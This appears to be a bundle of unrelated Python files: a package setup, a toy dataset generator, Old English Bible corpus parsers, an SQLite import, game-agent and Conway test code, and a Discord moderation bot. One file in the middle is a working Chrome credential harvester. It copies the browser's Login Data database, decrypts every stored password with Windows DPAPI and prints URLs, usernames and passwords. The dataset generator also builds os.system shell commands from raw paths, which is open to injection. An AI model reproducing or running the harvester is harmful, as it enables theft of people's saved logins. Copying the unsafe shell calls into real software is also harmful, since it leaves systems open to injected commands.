        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
    ],
    project_urls = {
        'Documentation': 'http://dbpool.python.webcodex.de',
        'Source': 'http://github.com/cpruefer/python-dbpool',
    },
    packages = [
        'dbpool'
    ],
    # Package sources live under src/ rather than dbpool/.
    package_dir = {
        'dbpool': 'src/'
    },
    install_requires = [
        'psycopg2'
    ],
    python_requires = '>=3',
    zip_safe = True
)
|
from tqdm import tqdm
import random
import csv
import sys
import os
#=========1=========2=========3=========4=========5=========6=========7=
# Generates a new dataset in "dest" called "n-ary_toy_dataset" which
# is a directory hierarchy with n-ary tree structure. The leaf nodes
# contain 100 text files each, where each text file contains 100 words
# per line and 100 lines. Each word in every text file in a given leaf
# node is the same, taken from a list of seed words.
# A .csv file called "seed_words.csv" should be in the same directory
# as this script for proper functionality.
#=========1=========2=========3=========4=========5=========6=========7=
def parse_args():
    """Read (dest, n, depth) from the command line.

    dest  - directory in which to place the toy dataset
    n     - branching factor of the generated tree
    depth - depth of the directory tree
    Exits with a friendly message when the numeric arguments are missing or
    not integers.
    """
    print("Parsing arguments. ")
    try:
        dest = sys.argv[1]
        n = int(sys.argv[2])
        depth = int(sys.argv[3])
    # FIX: int('x') raises ValueError (not TypeError), and a missing argument
    # raises IndexError — the original except never fired, so bad input
    # crashed with a traceback instead of the friendly message.
    except (ValueError, IndexError):
        print("You probably tried to pass a non-integer argument. These"
              + " are supposed to be natural numbers. ")
        exit()
    arg_list = [
        dest,
        n,
        depth,
    ]
    print("Arguments parsed. ")
    return arg_list
#=========1=========2=========3=========4=========5=========6=========7=
# DOES: checks whether or not a directory argument is valid
def check_valid_dir(some_dir):
    """Exit the program with a very visible banner unless some_dir is an
    existing directory."""
    if os.path.isdir(some_dir):
        return
    print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
    print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
    print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
    print("")
    print("DIES IST EIN UNGÜLTIGES VERZEICHNIS!!!!")
    print("")
    print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
    print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
    print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
    exit()
#=========1=========2=========3=========4=========5=========6=========7=
''' DOES: reads from "seed_words.csv" and gets a list of all words in it
RETURNS: a list of words from the file '''
def read_seed():
    """Read every word from ../seed_words.csv and return them as a flat list.

    Exits with a hint when the file is missing.
    """
    try:
        with open('../seed_words.csv', 'r') as csvfile:
            reader = csv.reader(csvfile, delimiter=',', quotechar='|')
            return [word for row in reader for word in row]
    except FileNotFoundError:
        print("Make sure you have a seed_words.csv file in the parent"
              + " directory of this folder. ")
        exit()
#=========1=========2=========3=========4=========5=========6=========7=
# DOES: recursively generates an n-ary tree toy dataset with sample
# text files in the leaf directories.
# NOTE: depth should always be passed in as the height of the tree down
# to the leaf directories PLUS ONE, since depth should be the
# height of the text files within the tree, which are inside the
# leaf directories. Same holds for csv function.
def generate_dataset_txt(dataset_path, num_children, depth, word_list):
    """Recursively build the n-ary tree; at depth 1 write 20 identical .txt
    files (100 lines of the same seed word) into the leaf directory.

    NOTE(review): used_words is reset on every call, so the "no repeats"
    loop only guards within one leaf — different leaves can still draw the
    same word despite the total_words_needed check below.
    """
    total_words_needed = num_children**depth
    if len(word_list)<total_words_needed:
        print("You only have", len(word_list), "seed words in your file.\nYou need at least", total_words_needed)
        exit()
    used_words = []
    if (depth == 1):
        word = random.choice(word_list)
        while word in used_words:
            word = random.choice(word_list)
        used_words.append(word)
        row_list = []
        for k in tqdm(range(10)):
            row_list.append(word)
        word_string = ' '.join(token for token in row_list) + " "
        text_file_path = os.path.join(dataset_path, word + "_1" + ".txt")
        # Append mode: the file is written once, 100 identical lines.
        with open(text_file_path, 'a') as the_file:
            for j in tqdm(range(100)):
                the_file.write(word_string + "\n")
        # Copy the first file to <word>_0, <word>_2 .. <word>_19.
        # NOTE(review): os.system("cp ...") breaks on paths with spaces.
        for i in tqdm(range(20)):
            if i != 1:
                next_file_path = os.path.join(dataset_path,
                                              word + "_"
                                              + str(i) + ".txt")
                os.system("cp " + text_file_path + " " + next_file_path)
    else:
        # Interior node: create num_children subdirectories and recurse.
        for i in tqdm(range(num_children)):
            child_path = os.path.join(dataset_path, str(i))
            if not os.path.isdir(child_path):
                os.system("mkdir " + child_path)
            generate_dataset_txt(child_path,
                                 num_children, depth - 1, word_list)
#=========1=========2=========3=========4=========5=========6=========7=
def generate_dataset_csv(dataset_path, num_children, depth, word_list):
    """Same tree walk as generate_dataset_txt but writes comma-separated
    .csv leaf files; unlike the txt variant it performs no seed-word-count
    check and no duplicate-word avoidance."""
    if (depth == 1):
        word = random.choice(word_list)
        row_list = []
        for k in tqdm(range(10)):
            row_list.append(word)
        word_string = ','.join(token for token in row_list)
        text_file_path = os.path.join(dataset_path, word + "_1" + ".csv")
        with open(text_file_path, 'a') as the_file:
            for j in tqdm(range(100)):
                the_file.write(word_string + "\n")
        # NOTE(review): os.system("cp ...") breaks on paths with spaces.
        for i in tqdm(range(20)):
            if i != 1:
                next_file_path = os.path.join(dataset_path,
                                              word + "_"
                                              + str(i) + ".csv")
                os.system("cp " + text_file_path + " " + next_file_path)
    else:
        for i in tqdm(range(num_children)):
            child_path = os.path.join(dataset_path, str(i))
            if not os.path.isdir(child_path):
                os.system("mkdir " + child_path)
            generate_dataset_csv(child_path,
                                 num_children, depth - 1, word_list)
#=========1=========2=========3=========4=========5=========6=========7=
def main():
    """Create the n-ary toy dataset at dest/<n>-ary_toy_dataset.

    Reads dest, n, depth from the command line, then fills the leaf
    directories with both .txt and .csv sample files.
    """
    arg_list = parse_args()
    dest = arg_list[0]
    n = arg_list[1]
    depth = arg_list[2]
    # check if destination is valid, get its absolute path
    check_valid_dir(dest)
    dest = os.path.abspath(dest)
    # generate path to the new root of our toy dataset
    dataset_name = str(n) + "-ary_toy_dataset"
    dataset_path = os.path.join(dest, dataset_name)
    # make sure a directory with the same name doesn't already exist
    if os.path.isdir(dataset_path):
        print("This directory already exists, change the existing "
              + "directory's name, or try a different destination. ")
        exit()
    # FIX: use os.makedirs instead of shelling out — os.system("mkdir " + p)
    # silently breaks on paths containing spaces or shell metacharacters.
    os.makedirs(dataset_path)
    word_list = read_seed()
    # depth + 1 because the text files live one level below the leaf dirs.
    generate_dataset_txt(dataset_path, n, depth + 1, word_list)
    generate_dataset_csv(dataset_path, n, depth + 1, word_list)
    print("Should have worked. If you see a bunch of copy errors, "
          + "make sure there are no spaces between words in your "
          + "seed_words.csv file. ")
if __name__ == "__main__":
    # stuff only to run when not called via 'import' here
    main()
|
# Standard Libraries
import csv
import re
# additional libraries (pip install ...)
import bs4
from bs4 import BeautifulSoup
# Local Libraries
from src.data_manager import get_bible_book_id_map
from src.paths import *
from src.data_manager import BOOK_KEY, CHAPTER_KEY, VERSE_KEY, TEXT_KEY, ID_KEY
def parse_wycliffe():
    """
    Parses text files in the wycbible folder (using the index file to locate
    books) and transforms them into the t_wyc.csv bible-corpus format.

    Each verse row id is the packed decimal book/chapter/verse number
    (bookId * 1_000_000 + chapter * 1_000 + verse).
    """
    books = []
    id_ref = get_bible_book_id_map()
    # Map each known book name to its (book id, data file name).
    with open(WYCLIFFE_KEY_PATH, 'r') as key:
        for line in key:
            name, fn = line.strip().split(' - ')
            if name.lower() in id_ref:
                books.append((id_ref[name.lower()], fn.upper()))
    with open(WYCLIFFE_CSV_PATH, 'w', newline='', encoding='utf-8') as file:
        writer = csv.writer(file)
        writer.writerow([ID_KEY, BOOK_KEY, CHAPTER_KEY, VERSE_KEY, TEXT_KEY])
        for book_id, fp in books:
            with open(WYCLIFFE_DIRECTORY_PATH / fp, 'r') as book_fp:
                chapter_id = 1
                for line in book_fp:
                    line = line.strip()
                    # FIX: str.replace treats its argument literally, so the
                    # original replace(r"\[.*\]", "") never matched anything.
                    # Use re.sub (non-greedy, so multiple bracketed editorial
                    # notes on one line are stripped individually).
                    line = re.sub(r"\[.*?\]", "", line)
                    if match := re.match(r'^(\d+) (.+)', line):
                        # "<verse-number> <text>" line.
                        verse_id = int(match.group(1))
                        verse = match.group(2)
                        writer.writerow([f'%d%03d%03d' % (book_id, chapter_id, verse_id),
                                         book_id,
                                         chapter_id,
                                         verse_id,
                                         verse
                                         ])
                    elif match := re.match(r'^CAP (\d+)', line):
                        # "CAP <n>" marks the start of chapter n.
                        chapter_id = int(match.group(1))
def parse_aelfric_ot() -> None:
    """
    Parses the XML file and retrieves verses within the XML. Must first be
    downloaded using the web_scrape.py scripts to maintain path variables.

    Verse ids follow the same packed book/chapter/verse scheme as the other
    corpus CSVs.
    """
    id_ref = get_bible_book_id_map()
    with open(AELFRIC_OLD_TESTAMENT_XML_PATH, 'r', encoding='utf-8') as src, \
            open(AELFRIC_CSV_PATH, 'w', newline='', encoding='utf-8') as dest:
        writer = csv.writer(dest)
        writer.writerow([ID_KEY, BOOK_KEY, CHAPTER_KEY, VERSE_KEY, TEXT_KEY])
        xml_doc = BeautifulSoup(src.read(), 'lxml')
        # extract the xml structure and the sample book numbers
        struct = xml_doc.find('biblstruct')
        sample_scope = struct.find('monogr').find_all('biblscope')
        sample_ids = [id_ref[scope.text.split(' ')[0].lower()] for scope in sample_scope]
        # extract the text
        text = xml_doc.find('text')
        # remove all the linebreaks in the text
        for lb in text.find_all('lb'):
            lb.decompose()
        # If run into <choice> tag, replace with correction
        for c in text.find_all('choice'):
            errata = c.find('corr')
            c.replaceWith(errata.text if errata else '')
        # If run into <supplied> or <foreign>, insert its own text.
        # FIX: the original used c.text — the stale loop variable from the
        # <choice> loop above — so every <supplied>/<foreign> element was
        # replaced by the last <choice>'s text instead of its own.
        for s in text.find_all(re.compile('(supplied|foreign)')):
            s.replaceWith(s.text)
        # If run into milestone, remove type with scriptural
        for m in text.find_all('milestone', attrs={'type': 'scriptural'}):
            m.decompose()
        # Remove notes and page breaks
        for n in text.find_all(re.compile('(note|pb)')):
            n.decompose()
        samples = text.find_all('div', attrs={'type': 'sample'})
        for idx, s in zip(sample_ids, samples):
            s = s.find('p')
            verse = ''
            # The 'n' attribute carries "chapter.verse"; pad with '0' in case
            # the verse part is missing.
            cv = s.contents[0]['n'].split('.') + ['0']
            chapter_id = int(cv[0])
            verse_id = int(cv[1])
            i = 1
            # Accumulate text between marker tags; each new tag flushes the
            # verse collected so far.
            # NOTE(review): text accumulated after the final marker tag is
            # never written — confirm the source always ends with a marker.
            while i < len(s.contents):
                if isinstance(s.contents[i], bs4.element.NavigableString):
                    verse += str(s.contents[i]).strip()
                elif isinstance(s.contents[i], bs4.element.Tag):
                    writer.writerow([f'%d%03d%03d' % (idx, chapter_id, verse_id), idx, chapter_id, verse_id, verse])
                    verse = ''
                    cv = s.contents[i]['n'].split('.') + ['0']
                    chapter_id = int(cv[0])
                    verse_id = int(cv[1])
                i += 1
def parse_homilies():
    """
    Parses the formatted homilies text file into t_hom.csv format stored in
    misc_texts. See README in misc_texts for formatting information.

    The input is read in triples of lines: Old English, Modern English, and
    a separator line that is discarded.
    """
    with open(DATA_RAW_PATH / "aelfric-homilies.txt", "r", encoding='utf-8') as f, \
            open(MISC_TEXTS_PATH / 't_hom.csv', 'w', newline='', encoding='utf-8') as file:
        writer = csv.writer(file)
        writer.writerow(['id', 'text', 'translation'])
        lines = f.readlines()
        for sentence_id, start in enumerate(range(0, len(lines), 3), 1):
            writer.writerow([sentence_id, lines[start].rstrip(), lines[start + 1].rstrip()])
if __name__ == '__main__':
    # Regenerate all three corpus CSVs when run as a script.
    parse_wycliffe()
    parse_homilies()
    parse_aelfric_ot()
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sqlite3
import pandas as pd
def importSimTradeToSQLite():
    """Reload the simtrade table from the simTrade.xlsx spreadsheet.

    Wipes the table, bulk-inserts (mobile, registration date, trading days)
    rows as strings, then prints the distinct mobile numbers as a check.
    """
    with sqlite3.connect(r'C:\sqlite\db\hxdata.db') as db:
        insert_template = "INSERT INTO simtrade " \
                          "(usrmobile, createtime, tradedays) " \
                          "VALUES (?, ?, ?);"
        db.execute('DELETE FROM simtrade;')
        # FIX: the keyword is sheet_name — the old 'sheetname' spelling was
        # removed from pandas.read_excel.
        df = pd.read_excel(r'..\input\simTrade.xlsx', sheet_name='仿真用户')
        # .copy() so the astype assignments below act on an independent frame
        # instead of a view of df (avoids SettingWithCopyWarning).
        df1 = df[['手机号', '注册日期', '交易天数']].copy()
        print(df1)
        # Convert the columns to strings before inserting.
        df1['手机号'] = df1['手机号'].astype('str')
        df1['注册日期'] = df1['注册日期'].astype('str')
        df1['交易天数'] = df1['交易天数'].astype('str')
        try:
            print('3')
            db.executemany(insert_template, df1.values)
        except sqlite3.Error as e:
            print('2')
            print(e)
            db.rollback()
        else:
            db.commit()
        # Sanity check: count and print the distinct mobile numbers stored.
        select_stmt = 'SELECT DISTINCT usrmobile FROM simtrade;'
        number = 0
        for row in db.execute(select_stmt).fetchall():
            print(str(row))
            number = number + 1
        print(number)
#importSimTradeToSQLite()
|
from battle.arena_sc2 import BattleType, make, ids, spec
import battle.arena_sc2.arenas
import battle.arena_sc2.envs
import battle.arena_sc2.agents
from absl import app
def list_agent_spec(unused_argv):
    """Print every registered agent id, then each agent's spec details."""
    agent_ids = ids(BattleType.agent)
    print(agent_ids)
    for current_id in agent_ids:
        agent_spec = spec(current_id)
        print('id={}, type={}, kwargs={}'.format(agent_spec.id, agent_spec.type, agent_spec.def_kwargs))
if __name__ == '__main__':
    # absl parses flags and then invokes list_agent_spec(argv).
    app.run(list_agent_spec)
|
import os
import sqlite3
from win32 import win32crypt
import sys
class retreive:
    """Recovers saved Chrome credentials from the local 'Login Data' store."""

    @staticmethod
    def chrome():
        """Return a list of formatted URL/username/password strings.

        Copies Chrome's Login Data SQLite db to a temp location (the live
        file is locked while Chrome runs), decrypts each stored password
        with the Windows DPAPI, and removes the copy afterwards.  Returns
        an empty list if the database cannot be read.
        """
        try:
            path = sys.argv[1]
        except IndexError:
            # Default to the current user's Chrome profile.
            w = os.getenv('LOCALAPPDATA')
            path = str(w) + r'\Google\Chrome\User Data\Default\Login Data'
        # Connect to the Database (work on a copy: Chrome locks the original)
        try:
            file = open(path, "rb")
            newfile = open("C:\Windows\Temp\ld.db", "wb")
            newfile.write(file.read())
            newfile.close()
            file.close()
            conn = sqlite3.connect("C:\Windows\Temp\ld.db")
            cursor = conn.cursor()
        except Exception:
            # FIX: the original swallowed this error with a no-op `None`
            # statement and then crashed with NameError on `cursor`.
            return []
        # Get the results
        try:
            cursor.execute('SELECT action_url, username_value, password_value FROM logins')
        except Exception:
            conn.close()
            return []
        data = cursor.fetchall()
        pass_list = []
        if len(data) > 0:
            for result in data:
                # Decrypt the Password.
                # FIX: reset per row — previously a failed decrypt left the
                # prior row's password bound (or the name unbound entirely).
                password = None
                try:
                    password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
                except Exception:
                    pass
                if password:
                    pass_list.append(('''[+] URL: %s
Username: %s
Password: %s''' %(result[0], result[1], password.decode())))
        conn.close()
        os.remove("C:\Windows\Temp\ld.db")
        return pass_list
|
import datetime
import sys
import log
from status import Status
logging = log.getLogger()
class History(object):
    """Read-side helper over stored chord executions (Python 2 module —
    note the print statements in listPrevious)."""
    def __init__(self, db):
        # db: storage backend exposing getExecutions().
        self.db = db
    def _interpretFilter(self, filter):
        # NOTE(review): appears unfinished — the split result is never used
        # and nothing is returned.
        parts = filter.split( ',' )
    def listPrevious(self, chord_name):
        """Print each stored execution of chord_name: a separator, a
        pipe-joined summary row, then the captured output."""
        previous = self.db.getExecutions( chord_name = chord_name )
        rows = []  # NOTE(review): unused
        for p in previous:
            identifier, time_start, chord_name, execution_time, status, output = p
            # NOTE(review): identity compare (`is`) against the enum member —
            # works only if getExecutions returns the Status singletons.
            status = "OK" if status is Status.SUCCESS else "FAILED"
            row = [ identifier,
                    datetime.datetime.utcfromtimestamp( time_start ),
                    chord_name,
                    execution_time,
                    status,
                  ]
            row = [ str( i ) for i in row ]
            row = "| ".join(row)
            print "-" * len(row)
            print row
            print output
|
import conway
def test_get_live_neighbours():
    """Moore-neighbourhood live counts for every cell of a fixed 4x3 grid
    (grid[row][col], 1 = alive; the corner expectations show edges are
    apparently not wrapped)."""
    assert conway.get_live_neighbours_count(0, 0, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
    assert conway.get_live_neighbours_count(0, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
    assert conway.get_live_neighbours_count(0, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 2
    assert conway.get_live_neighbours_count(1, 0, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 3
    assert conway.get_live_neighbours_count(1, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 5
    assert conway.get_live_neighbours_count(1, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 3
    assert conway.get_live_neighbours_count(2, 0, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
    assert conway.get_live_neighbours_count(2, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 3
    assert conway.get_live_neighbours_count(2, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 2
    assert conway.get_live_neighbours_count(3, 0, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 2
    assert conway.get_live_neighbours_count(3, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 3
    assert conway.get_live_neighbours_count(3, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 2
def test_apply_4_rules():
    """apply_4_rules(row, col, live_neighbour_count, grid) should return the
    cell's next state under Conway's rules: a live cell survives with 2 or 3
    neighbours, a dead cell is born with exactly 3."""
    assert conway.apply_4_rules(0, 0, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
    assert conway.apply_4_rules(0, 1, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
    assert conway.apply_4_rules(0, 2, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
    assert conway.apply_4_rules(1, 0, 3, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
    assert conway.apply_4_rules(1, 1, 5, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
    assert conway.apply_4_rules(1, 2, 3, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
    assert conway.apply_4_rules(2, 0, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
    assert conway.apply_4_rules(2, 1, 3, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
    assert conway.apply_4_rules(2, 2, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
    assert conway.apply_4_rules(3, 0, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
    assert conway.apply_4_rules(3, 1, 3, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
    assert conway.apply_4_rules(3, 2, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
|
import discord
from discord.ext import commands
import discord.utils
from discord.utils import get
import asyncio
import random
import datetime
import json
prefixes = ['!']
# Single shared bot instance; all commands and event handlers below attach
# to it at import time.
bot = commands.Bot(
    command_prefix=prefixes,
    description='Public testing bot',
    owner_id=385432707578069003,
    case_insensitive=True
)
# Find and load the .JSON file.
def get_logchannels(bot, message):
    """Return the log-channel entry for the message's guild.

    Looks the guild id up in logchannels.json; the stored value is '.' when
    no log channel has been configured for that guild (see the callers).
    """
    with open('logchannels.json', 'r') as f:
        mapping = json.load(f)
    return mapping[str(message.guild.id)]
@bot.event
async def on_ready():
    # Startup banner, printed once the gateway session is established.
    print('NapoleonBot Canary Online!')
    print('Verison 1.0')  # NOTE(review): "Verison" typo is user-visible
# Set up the .JSON for storing server IDs and channel IDs.
@bot.event
async def on_guild_join(guild):
    """Register a newly joined guild in logchannels.json with the '.'
    placeholder (meaning: no log channel configured yet)."""
    with open('logchannels.json', 'r') as fh:
        mapping = json.load(fh)
    mapping[str(guild.id)] = '.'
    with open('logchannels.json', 'w') as fh:
        json.dump(mapping, fh, indent=4)
@bot.event
async def on_guild_remove(guild):
    """Drop the guild's entry from logchannels.json when the bot leaves."""
    with open('logchannels.json', 'r') as fh:
        mapping = json.load(fh)
    mapping.pop(str(guild.id))
    with open('logchannels.json', 'w') as fh:
        json.dump(mapping, fh, indent=4)
# Support Commands
@bot.command()
async def display(ctx):
    """Post the support-desk embed linking the status and support channels."""
    achannel = bot.get_channel(637379670828122130)  # admin/support channel
    channel = bot.get_channel(637423009338228742)   # status channel
    embed = discord.Embed(title="Support desk", description="")
    embed.set_author(name="NapoleonBot")
    # FIX: the f prefix was on the name= literals instead of the value=
    # literals, so users saw the raw "{channel.mention}" text.
    embed.add_field(name='Bot is not responding / offline', value=f'Our servers are down, check {channel.mention}', inline=False)
    embed.add_field(name='Inviting NapoleonBot', value='Please visit: https://mierne.weebly.com/releases.html', inline=False)
    embed.add_field(name='I need support', value=f'Ping an administrator in {achannel.mention}', inline=False)
    embed.set_footer(text="")
    await ctx.send(embed=embed)
@bot.command()
async def helpc(ctx):
    """Send the command-overview embed."""
    embed = discord.Embed(title="Help [USAGE]", description="Commands and what they do.")
    embed.set_author(name="NapoleonBot")
    entries = (
        ('Help', 'Displays this message', False),
        ('Purge', 'Delets a set amount of messages', False),
        ('Mute', 'Mutes a member', False),
        ('Unmute', 'Unmutes a member', False),
        ('Ban', 'Bans a user', True),
        ('Unban', 'Unbans a user', True),
        ('Kick', 'Kicks a user', True),
    )
    for field_name, field_value, is_inline in entries:
        embed.add_field(name=field_name, value=field_value, inline=is_inline)
    embed.set_footer(text="Created by Mierne")
    await ctx.send(embed=embed)
# Debug Commands
@bot.command()
async def info(ctx):
    """Reply with basic context about the invoking user, channel and time."""
    author = ctx.message.author
    where = ctx.message.channel
    asked_at = ctx.message.created_at.strftime("%c")
    await ctx.send(f'You are {author}, in the {where.mention} channel. You asked on: {asked_at}, the server was created on NULL')
@bot.command(pass_context=True)
async def ping(ctx):
    """Report the websocket latency in milliseconds."""
    latency_ms = round(bot.latency * 1000)
    await ctx.send(f':ping_pong: Pong! {latency_ms}ms')
## Fun Commands
@bot.command()
async def say(ctx, *, arg):
    """Echo the given text, then delete the invoking message."""
    await ctx.send(arg)
    await ctx.message.delete()
# Moderation commands
@bot.command()
async def kick(ctx, member : discord.Member, *, reason=None):
    """Kick a member, announce it, and mirror the action to the log channel."""
    await member.kick(reason=reason)
    mUser = ctx.message.author
    log_channel_id = get_logchannels(bot, ctx.message)
    if log_channel_id == ".":
        mchannel = None  # '.' means no log channel configured for this guild
    else:
        mchannel = bot.get_channel(int(log_channel_id))
    mmchannel = ctx.message.channel
    timeon = ctx.message.created_at.strftime("%c")
    await ctx.send (f'{member} was kicked. for {reason}')
    embed = discord.Embed(title="Moderator used command", description="View commands a moderor has used.")
    embed.set_author(name="NapoleonBot")
    embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
    embed.add_field(name='Kicked', value=f'{member.mention}', inline=False)
    embed.add_field(name='in the channel', value=f'{mmchannel}', inline=False)
    embed.add_field(name='at', value=f'{timeon}', inline=False)
    # FIX: guard the send — mchannel is None when no log channel is set,
    # and awaiting None.send() raised AttributeError.
    if mchannel is not None:
        await mchannel.send(embed=embed)
@bot.command()
async def ban(ctx, member : discord.Member, *, reason=None):
    """Ban a member, announce it, and mirror the action to the log channel."""
    await member.ban(reason=reason)
    # FIX: removed leftover unban code — member is a discord.Member here, so
    # member.split('#') raised AttributeError, and the bans() fetch was unused.
    mUser = ctx.message.author
    log_channel_id = get_logchannels(bot, ctx.message)
    if log_channel_id == ".":
        mchannel = None  # no log channel configured for this guild
    else:
        mchannel = bot.get_channel(int(log_channel_id))
    mmchannel = ctx.message.channel
    timeon = ctx.message.created_at.strftime("%c")
    await ctx.send (f'{member} was banned for {reason}')
    embed = discord.Embed(title="Moderator used command", description="View commands a moderor has used.")
    embed.set_author(name="NapoleonBot")
    embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
    embed.add_field(name='Banned', value=f'{member.mention}', inline=False)
    embed.add_field(name='in the channel', value=f'{mmchannel}', inline=False)
    embed.add_field(name='at', value=f'{timeon}', inline=False)
    # FIX: guard against a missing log channel (see kick).
    if mchannel is not None:
        await mchannel.send(embed=embed)
@bot.command()
async def unban(ctx, *, member):
    """Unban a user given as "Name#Discriminator" and log the action."""
    banned_users = await ctx.guild.bans()
    member_name, member_discriminator = member.split('#')
    mUser = ctx.message.author
    log_channel_id = get_logchannels(bot, ctx.message)
    if log_channel_id == ".":
        mchannel = None  # no log channel configured for this guild
    else:
        mchannel = bot.get_channel(int(log_channel_id))
    mmchannel = ctx.message.channel
    timeon = ctx.message.created_at.strftime("%c")
    for ban_entry in banned_users:
        user = ban_entry.user
        if (user.name, user.discriminator) == (member_name, member_discriminator):
            await ctx.guild.unban(user)
            await ctx.send(f'Unbanned {user.mention}')
            embed = discord.Embed(title="Moderator used command", description="View commands a moderor has used.")
            embed.set_author(name="NapoleonBot")
            embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
            # FIX: member is a plain string here (no .mention attribute —
            # the original raised AttributeError); use the resolved user.
            embed.add_field(name='unbanned', value=f'{user.mention}', inline=False)
            embed.add_field(name='in the channel', value=f'{mmchannel}', inline=False)
            embed.add_field(name='at', value=f'{timeon}', inline=False)
            # FIX: guard against a missing log channel (see kick).
            if mchannel is not None:
                await mchannel.send(embed=embed)
            return
@bot.command()
@commands.has_permissions(manage_messages=True)
async def purge(ctx, *, amount : int):
    """Delete *amount* messages from the current channel and log the action.

    Fixes: the original called `purge` twice (L-level duplicate), deleting
    up to 2x the requested number of messages; and crashed on
    `mchannel.send` when no log channel was configured.
    """
    mUser = ctx.message.author
    log_channel_id = get_logchannels(bot, ctx.message)
    if log_channel_id == ".":
        mchannel = None
    else:
        mchannel = bot.get_channel(int(log_channel_id))
    mmchannel = ctx.message.channel
    timeon = ctx.message.created_at.strftime("%c")
    # Purge exactly once; `x` holds the deleted messages for the report.
    x = await mmchannel.purge(limit=amount)
    embed = discord.Embed(title="Moderator used command", description="View commands a moderator has used.")
    embed.set_author(name="NapoleonBot")
    embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
    embed.add_field(name='Purged', value=f'{len(x)}', inline=False)
    embed.add_field(name='messages in', value=f'{mmchannel}', inline=False)
    embed.add_field(name='at', value=f'{timeon}', inline=False)
    if mchannel is not None:
        await mchannel.send(embed=embed)
    await ctx.send('Messages purged.', delete_after=5)
@bot.command(pass_context=True)
async def mute(ctx, member : discord.Member, *args):
    """Give *member* the Muted role, remove the Member role, and log it.

    Fixes: the `member is None` guard ran only after `member.guild` had
    already been dereferenced; and `mchannel.send` crashed when no log
    channel was configured.
    """
    if member is None:
        await ctx.send('Please pass in a valid user')
        return
    role = get(member.guild.roles, name="Muted")
    rolea = get(member.guild.roles, name="Member")
    mUser = ctx.message.author
    log_channel_id = get_logchannels(bot, ctx.message)
    if log_channel_id == ".":
        mchannel = None
    else:
        mchannel = bot.get_channel(int(log_channel_id))
    mmchannel = ctx.message.channel
    timeon = ctx.message.created_at.strftime("%c")
    await member.add_roles(role)
    await member.remove_roles(rolea)
    await ctx.send(f'{member.mention} was muted!')
    embed = discord.Embed(title="Moderator used command", description="View commands a moderator has used.")
    embed.set_author(name="NapoleonBot")
    embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
    embed.add_field(name='Muted', value=f'{member.mention}', inline=False)
    embed.add_field(name='in the channel', value=f'{mmchannel}', inline=False)
    embed.add_field(name='at', value=f'{timeon}', inline=False)
    if mchannel is not None:
        await mchannel.send(embed=embed)
@bot.command()
async def unmute(ctx, member : discord.Member, *args):
    """Remove the Muted role from *member*, restore Member, and log it.

    Same fixes as `mute`: validate *member* before any attribute access,
    and skip the log-channel send when none is configured.
    """
    if member is None:
        await ctx.send('Please pass in a valid user')
        return
    role = get(member.guild.roles, name="Muted")
    rolea = get(member.guild.roles, name="Member")
    mUser = ctx.message.author
    log_channel_id = get_logchannels(bot, ctx.message)
    if log_channel_id == ".":
        mchannel = None
    else:
        mchannel = bot.get_channel(int(log_channel_id))
    mmchannel = ctx.message.channel
    timeon = ctx.message.created_at.strftime("%c")
    await member.add_roles(rolea)
    await member.remove_roles(role)
    await ctx.send(f'{member.mention} was unmuted.')
    embed = discord.Embed(title="Moderator used command", description="View commands a moderator has used.")
    embed.set_author(name="NapoleonBot")
    embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
    embed.add_field(name='Unmuted', value=f'{member.mention}', inline=False)
    embed.add_field(name='in the channel', value=f'{mmchannel}', inline=False)
    embed.add_field(name='at', value=f'{timeon}', inline=False)
    if mchannel is not None:
        await mchannel.send(embed=embed)
@bot.command()
async def logid(ctx, newid):
    """Store *newid* as this guild's log-channel id in logchannels.json."""
